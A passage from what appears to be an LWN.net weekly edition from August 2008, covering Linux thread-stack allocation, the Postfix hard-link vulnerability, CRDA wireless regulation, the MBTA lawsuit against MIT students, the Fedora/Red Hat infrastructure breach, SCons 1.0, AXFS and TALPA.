don't work the way they expect or they have to resort to the command-line
to get it done, they won't switch.  To get more people to switch, a good first
step is to hand out live CD/DVDs to people that have never heard of Linux.
Explain that they can play around with Linux and then take the disc out of
the drive and reboot to whatever was there before.  If they realize that
Linux can also extend hardware life, they just might be sold.

		Tangled up in threads


Certain kinds of programmers are highly enamored with threads, to the point
that they use large numbers of them in their applications.  In fact, some
applications create many thousands of threads.  Happily for this kind of
developer - and their users - thread creation on Linux is quite fast.  At
least, most of the time.  A situation where that turned out not to be the
case gives an interesting look at what can happen when scalability and
historical baggage collide.

A user named Pardo recently noted that, in
some situations, thread creation time on x86_64 systems can slow
significantly - as in, by about two orders of magnitude.  He was observing
thread creation rates of less than 100/second; at such rates, the term
"quite fast" no longer applies.  Happily, Pardo also did much of the work
required to track down the problem, making its resolution quite a bit
easier.

The problem with thread creation is the allocation of the stack to be used
by the new thread.  This allocation, done with mmap(), requires
locating a few pages' worth of space in the process's address range.  Calls
to mmap() can be quite frequent, so the low-level code which finds
the address space for the new mapping is written to be quick.  Normally, it
remembers (in mm-&gt;free_area_cache) the address just past the
end of the previous allocation, which 
is usually the beginning of a big hole in the address space.  So allocating
more space does not require any sort of search.

The mmap() call which creates a thread's stack is special, though,
in that it involves the obscure, Linux-specific MAP_32BIT flag.
This flag causes the allocation to be constrained to the bottom 2GB of the
virtual address space - meaning it should really have been called
MAP_31BIT instead.  Thread stacks are kept in lower memory for a
historical reason: on some early 64-bit processors, context switches were
faster if the stack address fit into 32 bits.  An application involving
thousands of threads cannot help being highly sensitive to context switch
times, so this was an optimization worth making.

The problem is that this kind of constrained allocation causes
mmap() to forget about mm-&gt;free_area_cache; instead,
it performs a linear search through all of the virtual memory areas (VMAs)
in the process's address space.  Each thread stack will require at least
one VMA, so this search gets longer as more threads are created.  


Where things really go wrong, though, is when there is no longer room to
allocate a stack in the bottom 2GB of memory.  At that point, the
mmap() call will return failure to user space, which must then
retry the operation without the MAP_32BIT flag.  Even worse, the
first call will have reset mm-&gt;free_area_cache, so the retry
operation must search through the entire list of VMAs a second time before
it is able to find a suitable piece of address space.  Unsurprisingly,
things start to get really slow at that point.


But the really sad thing is that the performance benefit which came from
using 32-bit stack addresses no longer exists with contemporary
processors.  Whatever problem caused the context-switch slowdown for larger
addresses has long since been fixed.  So this particular performance
optimization would appear to have become something other than optimal.


The solution which comes immediately to mind is to simply ignore the
MAP_32BIT flag altogether.  That approach would require that
people experiencing this problem install a new kernel, but it would be
painless beyond that.  Unfortunately, nobody really knows for sure when the
performance penalty for large stack addresses went away or how many
still-deployed systems might be hurt by removing the MAP_32BIT
behavior.  So Andi Kleen, who first implemented this behavior, has argued against its removal.  He also points
out that larger addresses could thwart a "pointer compression" optimization
used by some Java virtual machine implementations.  Andi would rather see
the linear search through VMAs turned into something smarter.


In the end, MAP_32BIT will remain, but the allocation of thread
stacks in lower memory is going away anyway.  Ingo Molnar has merged a single-line patch creating a new
mmap() flag called MAP_STACK.  This flag is defined as
requesting a memory range which is suitable for use as a thread stack, but,
in fact, it does not actually do anything.  Ulrich Drepper will cause glibc
to use this new flag as of the next release.  The end result is that, once
a user system has a new glibc and a fixed kernel, the old stack behavior
will go away and that particular performance problem will be history.


Given this outcome,
why not just ignore MAP_32BIT in the kernel and avoid the need
for a C library upgrade?  MAP_32BIT is part of the user-space ABI,
and nobody really knows how somebody might be using it.  Breaking the ABI
is not an option, so the old behavior must remain.  On the other
hand, one could argue for simply removing the use of MAP_32BIT in
the creation of thread stacks, making the kernel upgrade unnecessary.  As
it happens, switching to MAP_STACK will have the same effect;
older kernels, which do not recognize that flag, will simply ignore it.
But if, at some future point, it turns out there still is a performance
problem with higher-memory stacks on real systems, the kernel can be
tweaked to implement the older behavior when it's running on an affected
processor.  So, with luck, all the bases are covered and this particular issue
will not come back again.

		Standards, the kernel, and Postfix


Standards like POSIX are meant to make life easier for application developers
by providing rules on the semantics of system calls for multiple different
platforms.  Sometimes, though, operating system developers decide to change
the behavior of their platform—with full knowledge that it breaks
compatibility—for various reasons.  This requires
application developers to notice the change and take appropriate action;
not doing so can lead to a security hole like the one found in the Postfix 
mail transfer agent (MTA) recently.  


The behavior of links, created using the link() system call—on
Linux, Solaris, and IRIX—is what tripped up Postfix.  In particular, what
happens when a hard link is made to a symbolic link.  Many long-time UNIX
hackers don't realize that you can even do that, nor what to expect if you
do.  Postfix relied on a particular, standard-specified behavior that many
operating systems, including early versions of Linux, follow.


Links can be a somewhat confusing, or possibly unknown, part of UNIX-like
filesystems, so a bit of explanation is in order.  A link created with
link()—also known as a hard link—is an alias for a
particular file.  It simply gives an additional name by which a particular
chunk of bytes on the disk can be referenced.  For example:

creates a second entry in the filesystem (called /link/to/foo)
which points to the same file as
/path/to/foo.  The file being linked to must exist and reside on
the same filesystem as the link.


Symbolic links, on the other hand, are aliases of a different sort.  A
symbolic link creates a new entry (e.g. inode) in the filesystem which
contains the path of the linked-to file as a string.  There is no
requirement that the file exist or be on the same filesystem—the only
real requirement is that the path conform to standard pathname rules.
The symlink() system call is used to create them:

Both symbolic links and hard links can also be created from the command line
using the ln command (adding a -s option for symbolic
links).


So, when making a hard link to a symbolic link, there are two choices:
either follow the symbolic link to its, possibly nonexistent, target and
link to that or
link to the symbolic link inode itself.  POSIX requires that the symbolic
link be fully resolved to an actual existing file, which is the behavior
that Postfix relies upon.


The exact
sequence of events is lost in the mists of time, but Linux changed to
non-standard behavior—at least partially for compatibility with
Solaris—in kernel version 1.3.56 (which was released in January
1996).  Some discussion
prior to that change adds an additional reason for it: user space has no
way to make a link to a symbolic link without it.  Some saw that as a flaw
in the interface and proposed the change.  An application developer that
wanted the 
original behavior would be able to implement it by resolving any symbolic
links before making the hard link.


To further complicate things, it appears that the POSIX behavior was
restored in the 2.1 development series, only to be changed back in late 1998.
This change led to the comments currently in fs/namei.c for
the function implementing link(): 

Where oldname is the file being linked to and newname
is the name being 
created.  For the curious, KAB is Kevin Buhr and ADM is Alan Modra.


Unfortunately, according to Postfix author Wietse Venema, the
link(2) man page 
didn't change until sometime in 2006. This makes it fairly difficult for
application developers to learn about the change, especially because they
may not follow kernel development closely.


Postfix allows root-owned symbolic links to be used as the target for local
mail delivery, specifically to handle things like /dev/null on
Solaris, which is a symbolic link.
Because an attacker can make a link to a root-owned symbolic link on
vulnerable systems, Postfix can get confused and deliver mail to files that
it shouldn't.
This can lead to privilege escalation (via executing code as root)
by making a hard link to
a symbolic link of an init script (CVE-2008-2936). 


As Venema outlines in the Postfix
security advisory, the problem can be resolved by requiring that
symbolic links used for local delivery reside in a directory that is only
writeable by root. 
It is not a perfect solution, though: "This change will break
legitimate configurations that deliver mail 
to a symbolic link in a directory with less restrictive
permissions." 
There are other workarounds for people who don't want to use the provided
patch to Postfix.  Protecting the mail spool directory is one solution;
Venema provides a script to use to do that.  Some systems can be configured
to disallow links to files owned by others, which is another way to avoid
the problem. 


This issue has given Postfix a bit of a black eye, but that
is rather unfair. 
The problem was found by a SUSE code inspection, but it has existed in
certain kinds of Linux installations of Postfix for a long time.  It could
be argued that testing should have found it—there is a simple test for
vulnerable systems—but relying on documented behavior that is part of
an important standard that Linux is said to support is not completely
unreasonable either.  It is likely that the full implications of not
supporting the standard were not completely understood until recently.


Linux was still in its infancy when the original change went in.  One would
like to think that a change of that type today would be nearly impossible
because it breaks the kernel's user-space interface.  If it were to happen,
somehow, the resulting hue and cry would be loud enough that application
developers would hear.  But that's for intentional changes; a bug
introduced into a dark corner of the kernel's API might go unnoticed for
quite some time.  Hopefully, none of those lingers for ten years before
being discovered.


Update: The original article referred to CVE-2008-2937
as also being a consequence of the link issue, which it is not.  It is an
unrelated issue that was found during the same code review.

		Regulating wireless devices


Whenever a Linux system communicates with the rest of the world, it must
follow a whole set of rules on how that communication is done.  Basic
TCP/IP networking would work poorly indeed in the lack of an observed
agreement on how the networking medium should be used.  Wireless networking
has all of those constraints, plus a set of its own.  Since wireless
interfaces are radios, they must conform to rules on the frequencies they
can use, how much power they may emit, and so on.  If all goes well, Linux
will finally have a centralized mechanism for ensuring that wireless
devices are operated according to that wider set of rules.


Regulations on radio transmissions bring some extra challenges.  They are
legal code, so their violation can bring users, vendors, and distributors
into unwanted conversations with representatives of spectrum enforcement
agencies.  The legal code is inherently local, while wireless devices are
inherently mobile, so those devices must be able to modify their behavior
to match different sets of rules at different times.  And some wireless
devices can be programmed in quite flexible ways; they can be operated far
outside of their allowed parameters.  The possibility that one of these
devices could be configured - accidentally or intentionally - in a way
which interferes with other uses of the spectrum is very real.

The potential for legal problems associated with wireless interfaces has
cast a shadow over Linux for a while.  Some vendors have used it as an
excuse for their failure to provide free drivers.  Others (Intel, for
example), have reworked their hardware to lock up regulatory compliance
safely within the firmware.  And still, vendors and Linux distributors have
worried about what kind of sanctions might come down if Linux systems are
seen to be operating in violation of the law somewhere on the planet.
Despite all that, the Linux kernel has no central mechanism for ensuring
regulatory compliance; it is up to individual drivers to make sure that
their hardware does not break the rules.  This situation may be about to change,
though, as the Central
Regulatory Domain Agent (CRDA) patch set, currently being
developed by 
Luis Rodriguez, approaches readiness.


At the core of CRDA is struct ieee80211_regdomain, which describes
the rules associated with a given legal regime.  It is a somewhat
complicated structure, but its contents are relatively simple to
understand.  They include a set of allowable frequency ranges; for each
range, the maximum bandwidth, allowable power, and antenna gain are
listed.  There's also a set of flags for special rules; some domains, for
example, do not allow outdoor operation or certain types of modulation.
Each domain is associated with a two-letter identifying code which,
normally, is just a country code.


There is a new mac80211 function which drivers can call to get the current
regulatory domain information.  But, unless the system has some clue of
where on the planet it is currently located, that information will be for
the "world domain," which, being 
designed to avoid offending spectrum authorities worldwide, is quite
restrictive.  Location information is often available from wireless access
points, allowing the system to configure itself without user intervention.
Individual drivers can also provide a "location hint" to the regulatory
core, perhaps based on regulatory information written to a device's EEPROM
by its vendor.  If need be, the system administrator can also configure in
a location by hand.


The database of domains and associated rules lives in user space, where it
can be easily updated by distributors.  When the name of the domain is set
within the kernel, an event is generated for udev which, in turn, will be
configured to run the crda utility.  This tool will use the domain
name to look up the rules in the database, then use a netlink socket to
pass that information back to the kernel.  From there, individual drivers
are told of the new rules via a notifier function.


[PULL QUOTE: 
No distributors have made any policy plans public, but one
assumes that the signing keys for the CRDA database will not be distributed
with the system.
 END QUOTE]


The database is a binary file which is digitally signed; if the signature
does not match a set of public keys built into crda, then
crda will refuse to use it.  This behavior will protect against a
corrupted database, but is also useful for keeping users from modifying it
by hand.  No distributors have made any policy plans public, but one
assumes that the signing keys for the CRDA database will not be distributed
with the system.  We're dealing with free software, so getting around this
kind of restriction will not prove challenging for even moderately
determined users, but it should prevent some people from cranking their
transmitted power to the maximum just to see what happens.

The CRDA mechanism, once merged into the kernel and once the wireless
drivers actually start using it, should be enough to ensure that Linux
systems with well-behaved users will be well-behaved transmitters.  Whether
that will be enough to satisfy the regulatory agencies (some of which have
been quite explicit on their doubts about whether open-source regulatory
code can ever be acceptable) remains to be seen.  But it is about the best
that we can do in a free software environment.

		Injunction lifted against MIT students


Three MIT students won a victory in court this week, but it was a rather
bittersweet one as the injunction that was overturned was, at best,
dubious.  The students had researched the security of the Massachusetts Bay
Transportation Agency's (MBTA) tickets and pre-paid cards.  They were
planning to give a presentation about their findings at the DEFCON security
conference when MBTA
sued them.  Even after the Electronic Frontier Foundation (EFF) stepped
in to represent the students, MBTA was able to get a ten-day injunction
that made 
the presentation impossible.


The judge who issued the injunction relied on the Computer Fraud and Abuse
Act, a statute aimed at preventing computer intrusions, to make his
decision.  He 
ruled that speaking at a conference was a "transmission" of a 
computer program that could harm MBTA by allowing people to get free subway
rides.  The free speech rights of the students, Zack Anderson, RJ Ryan and
Alessandro Chiesa, were completely ignored by the judge.  Unfortunately, when
a second judge lifted the
injunction this week, he did it on narrow 
grounds, not 
considering the First Amendment issues either.  He instead, ruled that MBTA
was unlikely to succeed on the merits of its case.


While the injunction has been lifted, the suit continues.  MBTA is likely
to be the biggest loser in all of this for a number of reasons, not least
of which is the "Streisand Effect".  By trying to squelch discussion of
their security problems, MBTA ensured that the story got much wider play
than it would have as a report from DEFCON.  As Barbara Streisand found out
when she tried to remove aerial pictures of her Malibu estate from a
California coastal survey, suing someone to stop information from flowing
rarely works; in fact, on the internet, it generally backfires. 


After getting an "A" in Professor Ron Rivest's—the R in
RSA—class, the students met with MBTA to outline what they had found.
They 
also provided a confidential report that included all of the details.  They
told MBTA that they planned to keep some of those details 
out of the DEFCON presentation to
stop others from trivially exploiting the system.  With no advance warning,
48 hours before the presentation, MBTA sued to get an injunction.


Had MBTA done its homework, it would have realized that the slides
of the presentation [PDF] were already available, both on the net and
on CDs given to the conference attendees.  Worse still, MBTA entered the
confidential report, with details left out of the presentation, into the
open court record.  For an agency that claimed that release of the
information would cause harm, it did far more to harm to
itself than the students did.


It is a common fallacy that security problems are somehow, magically kept
at bay if they are not discussed.  Time and again we see organizations try
to stifle discussion of security problems rather than to actually address
them.  Any system that is likely to attract the attention of "white hat"
security researchers is very likely to have attracted others as well.  In
fact, for a system like MBTA's, where large amounts of money can be made,
the chances that someone of malicious intent isn't already looking for
vulnerabilities are vanishingly small.


By treating the "MIT Three" as criminals, MBTA has done itself and the
Boston-area taxpayers a disservice.  The students are willing to work with
the agency to identify and fix the problems, but not while they are being
sued.  The agency told the judge this week that it would take it five
months to fix the problems identified—it is hard to see how that is
expedited by spending time in court.


While the students were under a gag order, various MBTA officials were
saying that there were no security problems.  Because their First Amendment
rights had been suspended, the students were unable to respond to defend
their research.  Only
recently has the agency confessed that they do, indeed, have security
problems.  This is one of the reasons that  "prior restraint" on free
speech has been deemed 
unconstitutional in various cases, including the famous "Pentagon Papers"
case. 


It is hard to see how the students could have been more "responsible" with
their disclosure.  It is not as if these vulnerabilities came out of left
field; similar types of problems had been reported for other transit
systems.  Had MBTA done its job, the students might not have been able to
find any flaws to report on.  But, instead of thanking them and, perhaps,
hiring them, MBTA tried to bully them.  The next time someone finds a flaw
in their systems, they may decide to anonymously report it with full
details—or exploit it for free subway rides.


		One week of infrastructure issues


On August 14, Fedora leader Paul Frields sent out a terse announcement regarding
"an issue in the infrastructure systems" supporting the project.  This
"issue" could lead to some service outages, for which he apologized.  Also
included in the note was this ominous warning:


	We're still assessing the end-user impact of the situation, but as
	a precaution, we recommend you not download or update any
	additional packages on your Fedora systems.


As this article is written (August 20, just barely in time for the LWN
weekly publication deadline), there have been a couple of uninformative
updates, but the situation persists and nobody seems to know what is really
going on.  The Fedora team, it would seem, is quite good at keeping secrets
when the need arises.  As a result, Fedora users worldwide have spent
almost a full week wondering what has happened and whether they need to be
worried about it.

In such a situation, there is a delightful amount of space for wild
speculation.  Your editor does not usually start his drinking binge until
after publication, but, for the purposes of interpreting the following, one
should assume that it was already well underway.  This "issue" could be
explained by any of the following:


 Maybe a Fedora developer - on a drinking binge of his own, perhaps - 
     tripped over a power cord.  The resulting mess not only deprived
     an important server of power, but said developer, on his way toward
     the floor, managed to take the entire rack down with him.  Ever since,
     the infrastructure team has been trying to reassemble a set of working
     systems from the rubble.

 Last month, Fedora slipped a small patch into gcc designed to ensure
     that the results from the most recent board election - where one slot
     went to a candidate who was not a Red Hat employee - would never be
     repeated.  But the patch was botched, and most mathematical operations
     in gcc-compiled programs have been returning random numbers ever since.
     Now the Fedora team is trying to quietly replace the broken binaries
     before anybody notices.

 It turns out that the rights to the Fedora name had never actually
     been secured, and the real owner got an injunction shutting the
     project down.  As soon as all the branding has been changed, Fedora
     will be reborn as Leopard-Skin Pillbox Hat Linux.  Just wait until you
     see the new desktop themes.

 The package signing key has been compromised, as have the build
     servers.  For the last six months, every version of Firefox shipped
     by Fedora has reported account names, passwords, and credit card
     numbers to a server located on a ship in international waters near
     Colombia.  The openssh client has been similarly modified.  The Fedora
     team has been slow to get an explanation out because it takes time to
     relocate your home and family to an undisclosed location on a
     different continent.

 A vulnerability in RPM has enabled the creation of a large ecosystem
     of hostile mirrors operated by competing criminal groups.  Most Fedora
     users have been installing compromised updates for the last year or
     so.

 No less than three Fedora system administrators turned out to be the
     type of people who will give out
     their password for a bar of chocolate.  The provider of sweets
     really only wanted to fix the longstanding claws-mail dependency
     problems in Rawhide, but the project hit the panic button anyway.

 The Fedora team simply wanted to take a vacation in an undisclosed
     location on a different continent and didn't want to deal with a bunch
     of email on their return.


The real point of this being, of course, that none of us know what is going
on, creating a situation described by Alan
Cox as "leaving people in the dark assuming the worst - a very bad
way to create long term trust."  Distributors occupy a crucial part
of our ecosystem; they absolutely need to have the  trust of their
users.  There is just too much that can go wrong at that level.


One can only assume that something fairly serious has happened.  By all
accounts, the Fedora team has been working flat-out to get things resolved
as quickly as possible; they seem to be doing an exceptional job under a
great deal of pressure.  They have undoubtedly earned a big round of thanks
- and lots of beers - from the Fedora community as a whole.


But Fedora's leadership appears to have failed here.  If Fedora users need to be
concerned about the software running on their systems, they should have
been told by now.  If they can relax and stop worrying, they should have
been told that as well.  Instead, the Fedora user community has been left
wondering for nearly a week while the infrastructure they count on is torn
down and rebuilt from the beginning.  Given that, Fedora users have shown a
tremendous amount of patience and restraint; the user community clearly has
a high degree of confidence in the project in general, and has been willing
to wait until the project is ready to come clean.

To retain that confidence, the Fedora project will have to tell the full
story in a clear manner - and sooner would certainly be better.  A good
explanation of why Fedora users were made to wait so long before hearing
anything about how this "infrastructure issue" affects them will also be
needed.  Fedora users are concerned about what has happened so far, but
their real response will be determined by what Fedora does next.

		Fedora, Red Hat, and distributor security


On August 22, the Fedora Project released an "infrastructure report"
confirming what most observers had, by then, suspected: the project had
suffered a major security breach.  The attacker got as far as a system used
to sign packages distributed by Fedora.  That, of course, is something
close to a worst-case scenario: if an intruder has control over such a
system, it's a relatively small step to capture the package signing key and
the passphrase used to employ that key.  And those, in turn, could be used
to create hostile packages which would be accepted as genuine by Fedora
installations worldwide.


Fortunately for the Fedora Project (and its users), an audit has determined
that nobody made use of the key while the intruder was present.  So, even
if some means for capturing something as transient as the passphrase were
in place, that passphrase was not exposed, and, thus, cannot have been
compromised.


Needless to say, the project is changing its package signing key anyway.


Interestingly, the Fedora Project was not the only target in this attack: Red Hat,
too, was compromised.  Unlike Fedora, Red Hat did not issue a statement
specifically about this intrusion; instead, the information was included in
an openssh
security update.  In this case, the attacker was more successful, to
the point of being able to sign "...a small number of OpenSSH
packages relating only to Red Hat Enterprise Linux 4 (i386 and x86_64
architectures only) and Red Hat Enterprise Linux 5 (x86_64 architecture
only)." This language deserves to be questioned: it is only
necessary to sign a single openssh package (certainly qualifying as a
"small number") to compromise thousands of RHEL hosts, and the "only" terms
describe what must be a large majority of deployed RHEL systems.  Seriously
scary, but Red Hat has been able to convince itself that none of the
compromised packages were fed out to RHEL subscribers.  So this attack,
too, failed - but not by much.


Needless to say, disclosures like this raise more questions than they
answer.  The one question that Fedora and Red Hat will have to answer at
some point is this: how did the intruder get in?  One assumes that Fedora
and Red Hat are running their own distributions on their internal systems;
it thus stands to reason 
that, if those distributions contained a vulnerability that allowed the
attacker to get in, many other systems will also be vulnerable.  If,
instead, this compromise is the result of administrator or developer error
(or, say, of a lost laptop), administrators responsible for Fedora and RHEL
systems can breathe a little easier.  Either way, they deserve to know how
this series of events came to pass.


Some people would like to have that information immediately.  Beyond that,
there has, predictably, been a fair amount of grumbling (also
predictably, from a relatively small number of people) on the Fedora lists
on how this incident was handled.  Your editor, too, has argued that some information
took too long to emerge.  He will now argue that, while Fedora still has
more to disclose, the project has said enough to give itself some breathing
room while it struggles to put its infrastructure back together and figure
out what really happened.  There's all kinds of good reasons why more
information may not be immediately forthcoming, including the obvious
possibility that nobody really knows yet how the intruder gained access.  There is
little to be gained from hammering on Fedora at this point at this time.

That said, anything the project can say to tell its users whether they
should be worried about an undisclosed vulnerability in their systems would
be most welcome, and sooner would be better than later.

Meanwhile, what can be done, and what Fedora board member Jeff
Spaleta, in particular, has been 
pushing for, is to think about how things should be handled the next time.
Says Jeff:


	Did we have a communication problem? Maybe. But communication
	problems are not equivalent to trust issues.  But considering that
	was a first of its kind event for us as a project, I don't think
	its necessarily unexpected to see some miscommunication. I don't
	think any of us, either inside Red Hat or outside had talked
	through how this sort of thing should be handled.  I don't remember
	a serious public discussion about how to deal with communication of
	an event like this before having an event like this. And I'm not
	going to let the assumption stand that to do things differently
	should have been obvious to those in a position to deal with the
	information...
	
	If people want things to be better, if god forbid something like
	this happens again, then a serious effort to write a communication
	process has to be written up and it must be agreeable to legal as a
	workable process that won't set off any legal liability landmines.


The Fedora Project should certainly write up a policy for situations like
this.  It would be good for Fedora's users, but it could have an effect far
beyond that: such a policy could serve as an example for other distributors
as well.  It is, after all, probably safe to say that Fedora is not the
only distributor which has, thus far, neglected to put plans in place for
this sort of disaster.

We all need such plans.  For better or for worse, distributors have come to
occupy an important position with regard to the security of much of the
net.  Millions of systems run packages signed by Linux distributors; they
depend, implicitly, on the security of the process used to create those
packages.  That process is not a small one; it can involve hundreds of
developers, before even counting all of those involved in upstream
development projects.  The consequences of a failure anywhere in that chain of trust
can be severe.  It is not surprising that the distribution system was
attacked; perhaps the only real surprise is that it has not happened more
often - that we know of.  These attacks will happen again; distributors
need to have a firm idea of how they will respond.

A related subject is worth a quick mention: as of this writing, the Fedora
Project has issued no security updates since August 12, almost a full
two weeks.  A number of significant vulnerabilities, including the postfix symbolic link
vulnerability, remain unpatched for Fedora users.  Red Hat has done
better, but not by much.  Linux users depend heavily on the distributor
security update process, and, for these two distributions, that process has
been severely disrupted.  If there had been a truly serious vulnerability
disclosed during this time, people charged with keeping Fedora and RHEL
systems secure might have found themselves in a difficult position.  One
need not be overly paranoid to envision this type of disruption being done
intentionally as part of a zero-day attack on the net.


This incident should serve as a sort of wake-up call for both distributors
and their users.  Distributors wanting to retain their users' trust should
be thinking about documenting things like:


 How the packaging chain is kept secure.  It would be good to know 
     how many people are able to sign packages, and how they gain access to
     the systems where this signing is done.

 What sort of plans the distributor has in place for dealing with
     security problems.  One can only assume that Red Hat dedicated (and
     continues to dedicate) a large amount of staff time to understanding
     and recovering from this incident.  Would other distributors be willing
     and able to do the same?

 What are the plans for dealing with a major security breach?  How
     might a critical security update be propagated during a time when the
     integrity of the packaging system has been compromised?

 Should something go wrong, when and how will information be
     communicated to the wider community?


Conversely, anybody who is deploying an important Linux-based system should
be asking such questions when choosing a distribution for that system.  If
the system requires high-assurance guarantees in this regard, it probably
makes sense to look at the vendors who are willing to provide such
guarantees for a fee.  But, again, the lesson we have learned from recent
events is that the time to ask these questions is now, and not when
something has gone wrong and people are running around in circles.


As a whole, Linux users have been very well served by distributors since
the very beginning.  The distributors pull together thousands of software
releases and integrate them into a coherent whole; they then make the
results available, often for free.  They provide fixes when things break,
and most of them pay particular attention to fixing security-related
problems.  And they have done a top-quality job of not being used as a
conduit for hostile software.  It's a great system, and that has not
changed.  But we have learned something about how heavily we depend on that
system, and how it can fail.  Proper application of the lessons from this
episode should help us all to be more secure in the future.

		The SCons build tool reaches the 1.0 milestone


After a two month release candidate stabilization period, version
1.0 of the SCons
build tool has been released. The SCons description states:


SCons is an Open Source software construction toolthat is, a next-generation build tool. Think of SCons as an improved, cross-platform substitute for the classic Make utility with integrated functionality similar to autoconf/automake and compiler caches such as ccache. In short, SCons is an easier, more reliable and faster way to build software. 


SCons is being distributed under the MIT license.
Steven Knight is the main developer, the rest of the SCons Development
team consists of
Chad Austin, Charles Crain, Steve Leblanc, Greg Noel, Gary Oberbrunner,
Anthony Roach, Greg Spencer and Christoph Wiedemann.
The SCons project history is described:


SCons began life as the ScCons build tool design which won the Software Carpentry SC Build competition in August 2000. That design was in turn based on the Cons software construction utility. This project has been renamed SCons to reflect that it is no longer directly connected with Software Carpentry (well, that, and to make it slightly easier to type...). 


An SCons document entitled
TheBigPicture
and the
Wikipedia entry
explain some of the unique SCons features.
These include:

Designed in a modular fashion.
 Uses Python scripts for configuration files.
 Has automatic dependency analysis features for C, C++ and Fortran.
 Supports many other languages and documentation formats.
 Supports multiple compilers for a given language.
 Provides a global view of all source tree dependencies.
 Uses MD5 signatures for detecting file changes.
 Has built-in support for numerous version control systems.
 Can access a large number of utility

tools.
 Operates with a large collection of

command line options.
 Integrates with a number of popular IDEs.
 Supports parallel compilation with load control.
 Is user extensible.
 Supports cross-platform operation and project development.


To get an idea where SCons stands in the variety of build tools
that are available, the documentation includes

a comparison between SCons and other tools.
The project's documentation is quite voluminous.
The nearly 10,000 line man page
is somewhat daunting, it even dwarfs the 8000 line long
mplayer
man page.  Fortunately, the document is available in an indexed

html version for easier reading.


A test installation of SCons 1.0 was tried on an Ubuntu i386 Hardy
Heron machine.  The code was
downloaded,
uncompressed and untared, then the following command was
executed as root from the source directory:  python setup.py install.
A test of SCons was performed on a relatively simple C program
that prints out the data from a stepped sine wave (sine2hex.c).
After plowing through some of the man page and doing a bit of
digging through the

SCons User Guide, your author
succeeded in compiling and linking the program.
An SConstruct file was created to describe the project, it consisted of
the following line:

Typing scons caused SCons to compile and link the program.
That is, of course, only the tip of the iceberg, but it shows that
the software is not too difficult to get started with.


SCons is being used by a variety of closed and open-source code
software projects, the
References
section lists these and includes user comments about the
advantages of switching from other build tools.
If you need a next-generation tool for maintaining a large
cross-platform project, SCons should be able to do the job.


		AXFS: a compressed, execute-in-place filesystem


Filesystems are clearly an area of high development interest at the moment;
hardly a week goes by without a new filesystem release for Linux popping up
on some list or other.  All of this development is motivated by a number of factors,
including the increasing size of storage devices and the increasing
capability of solid-state storage.  Beyond that, though, there is the simple
fact that there is no single filesystem which is optimal for all
applications.  The recently-announced AXFS filesystem is a clear
example of what can be done if one targets a specific use case and
optimizes for that case only.


At a first impression, AXFS seems like a simple and limited filesystem.  It
is, for example, read-only; the AXFS developers have made no provision for
changing the filesystem after it is created.  Some filesystems have a great
deal of code dedicated to the creation of the optimal layout of file blocks
on disk; AXFS has none of that.  Instead, it has a simple format which
divides the media into "regions" and, almost certainly, spreads accesses
across the device.  There is no journaling, no logging, no snapshots, and
no multi-device volume management.


What AXFS does provide is compressed storage using zlib.  It is, clearly,
aimed at embedded systems using flash-based storage.  For such devices, a
compressed filesystem can be built using the provided tools, then loaded
into a minimal amount of flash on each device.  It thus joins a number of
other compressed filesystems - cramfs and squashfs, for example - provided
for this sort of application.  One interesting aspect of compressed,
flash-oriented filesystems is their apparent ability to stay out of the mainline
kernel.  By posting AXFS for review on linux-kernel, developer Jared
Hulbert may be trying to avoid a similar fate.


The feature which makes AXFS different from squashfs and cramfs is its
support for execute-in-place (XIP) files.  Some types of flash can be
mapped directly into the processor's address space.  When running programs
stored on that flash, copying pages of executable code from flash into main
memory seems like a bit of a waste: since that code is already addressable
by the processor, why not run it from the flash?  Executing code directly
from flash saves RAM; it also makes things faster by eliminating the need
to copy those pages into RAM at page fault time.  As a result, systems
using XIP tend to boot more quickly, a feature which designers (and users)
of embedded systems appreciate.


Linux has had an execute in place
mechanism for a few years now, but relatively few filesystems make use
of it.  AXFS has been designed from the beginning to facilitate XIP
operation - that's its reason for existence (and the origin of the "X" in
its name).  

There is an additional twist, though.  One would ordinarily consider
compressed storage and XIP to be mutually exclusive - there is little value
in mapping compressed executable code into a process's address space.  To
be able to executed in place, a page of code must be stored uncompressed.
What makes AXFS unique is its ability to mix compressed and uncompressed
pages in the same executable file.  So pages which will be frequently
accessed can be stored uncompressed and executed in place.  Pages with
infrequently-needed code or which contain initialized data can be stored
compressed to save space and uncompressed at fault time.

This is a slick feature, but it is not of great use if one does not know
which pages of an executable file are heavily enough used to justify
storing them without compression.  Trying to determine this information and
manually pick the representation of each page seems like an error-prone
exercise - not to mention one which would tend to create high employee
turnover.  So another method is needed.

To that end, AXFS provides a built-in profiling mechanism.  Each AXFS
filesystem is represented by a virtual file under /proc/axfs;
writing "on" to that file will cause AXFS to make a note of every
page fault within the filesystem.  Reading that file then yields 
spreadsheet-like output showing, for each file, how many times each page
was faulted into the page cache.  Using this data, it is possible to
generate an AXFS filesystem image with an optimal number of compressed
pages for the target system.

Filesystems normally need a few rounds of review before they can make it
into the mainline; some filesystems need rather more than that.  AXFS is
sufficiently simple, though, that it may find a quicker path into the
kernel.  So far, the comments have mostly been positive, with the biggest
complaint being, perhaps, that its name is
too close to that of the existing XFS filesystem.  So a 2.6.28 merge for
AXFS, while far from guaranteed, would appear to be not entirely out of the
question.

		TALPA strides forward


When last we left TALPA, it was still floundering around without a
solid threat model, but over the last several weeks that part has
changed.  Eric Paris proposed
a fairly straightforward—though still somewhat
controversial—model for the threats that TALPA is supposed to
handle.  With that in place, there is at least a framework for kernel
hackers to evaluate different
ways to solve the problem, while also keeping in mind other potential uses.  


It seems almost tautological, but anti-virus scanning is supposed
to, well, scan files.  In particular, they scan for known
malware and block access to files when 
they are found to be infected.  For better or worse, scanning files is seen
as an 
essential security mechanism by many, so TALPA is trying to provide a means
to that end.  Paris describes it this way:

This is a file scanner.  There may be all
sorts of marketing material or general beliefs that they provide
security against all sorts of wide and varied threats (and they do),
but in all reality the only threats they provide any help against are
those that can be found by scanning files.  Simple as that.  Some may
argue this isn't "good" security and I'm not going to make a strong
argument to the contrary, I can stand here for days and show cases where
this is highly useful but no one can provide a threat model more than to
say, "we attempt to locate files which may be harmful somewhere in the
digital ecosystem and try to deny access to that data."


All of the various scenarios where active processes can infect files with
malware or actively try to avoid scanning can be ignored under this model.
While this looks like "security theater" to some, it avoids the endless
what-ifs that were bogging down earlier discussions.  It may not be a
threat model
that appeals to many of the kernel hackers, but it is one that they can
work with.


To many kernel developers—used to efficiency at nearly any
cost—time 
consuming filesystem scans seem ludicrous, especially since they only
"solve" a subset of the malware problem.  But the fact remains that Linux
users, particularly in "enterprise" environments, believe they need this
kind of scanning and are willing to pay for products that provide it.  The
current methods used by anti-virus vendors to do the scanning are
